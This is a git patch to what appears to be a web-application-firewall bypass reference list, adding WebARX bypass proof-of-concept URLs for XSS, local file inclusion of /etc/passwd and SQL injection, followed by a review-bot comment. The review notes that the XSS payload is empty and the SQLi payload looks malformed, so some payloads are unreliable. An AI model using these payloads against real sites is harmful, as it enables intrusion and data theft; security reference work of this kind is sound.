From de0c17045f8cc7fa5910132c1142bf79e04cb7cc Mon Sep 17 00:00:00 2001 From: Pinaki Mondal Date: Sun, 13 Oct 2019 22:05:31 +0530 Subject: [PATCH] Added update for more webarx bypasses --- README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/README.md b/README.md index 085869b..f392869 100644 --- a/README.md +++ b/README.md @@ -3707,6 +3707,20 @@ http://host.com/test.asp?file=.%./bla.txt ``` rightclickhere ``` +- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith) + + - XSS PoC + ``` + http://host.com/?vulnparam=&ithemes-sync-request + ``` + - LFI PoC + ``` + http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request + ``` + - SQLi PoC + ``` + http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request + ``` ### WebKnight - Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
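Review bot: In the added XSS PoC, the URL `http://host.com/?vulnparam=&ithemes-sync-request` has an empty `vulnparam` value, so the entry demonstrates nothing. The payload was probably lost as raw markup, and it should be put back in a form that survives rendering, for example URL-encoded. The SQLi PoC reads `1%20unionselect%20@@version,2--` with no separator between `union` and `select`; please confirm against the linked post whether that is intended. The heading says "Using A Whitelist String" but the entry never says that `ithemes-sync-request` is that string. Add a one-line explanation, plus the affected WebARX version or fix status if the linked post gives it, so readers can tell whether the bypass still applies. The first added line after the bullet is also an empty `+` line, which the neighbouring entries in the context do not appear to have.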